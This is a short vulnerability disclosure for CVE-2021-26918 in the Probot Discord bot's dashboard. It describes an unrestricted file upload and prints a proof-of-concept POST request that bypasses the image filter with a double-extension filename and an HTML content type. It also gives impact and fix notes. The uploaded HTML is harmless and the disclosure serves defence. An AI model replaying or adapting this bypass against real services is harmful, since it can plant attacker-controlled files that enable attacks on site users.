Discord Probot Arbitrary File Upload

`# Exploit Title: Discord Probot - Unrestricted File Upload   
# Google Dork: N/A  
# Date: 2021-02-08  
# Exploit Author: ThelastVvV  
# Vendor Homepage:probot.io  
# Version:Version 2021  
# Tested on: Debian 5.7.10-1parrot2  
# CVE:CVE-2021-26918  
  
  
About:  
Probot is a discord very customizable multipurpose bot for welcome image, In-depth logs, Social commands, Music, Moderation and many more ...  
  
# Description:  
  
The attacker can acces to probot dashboard and use image uploader in the welcomer tab , the attacl can upload many file types due the issues of unrestricted file uploads which can be bypassed by changing multipart/form-data POST request with a specially-crafted filename or mime type.  
  
# PoC:  
  
  
POST / HTTP/1.1  
Host: uploader.probot.io  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------  
Content-Length: 333  
Origin: https://probot.io  
DNT: 1  
Connection: close  
Referer: https://probot.io/server/""/welcomer  
  
-----------------------------  
Content-Disposition: form-data; name="file"; filename="ste.html.jpg"  
Content-Type: text/html  
  
<!DOCTYPE html>  
<html>  
<head>  
<title>bypasss</title>  
</head>  
<body>  
<div>bypass</div>  
</body>  
</html>  
  
-------------------------------  
  
Note:the link of the file will be generated depend on the content type in this case .html  
  
# Impact  
Unrestricted file uploads can be abused to exploit other vulnerable sections of an application when a file on the same or a trusted server is needed (can again lead to client-side or server-side attacks)  
  
#Solution  
File types should be restricted to only jpg ,png ,jpeg (text/img)  
`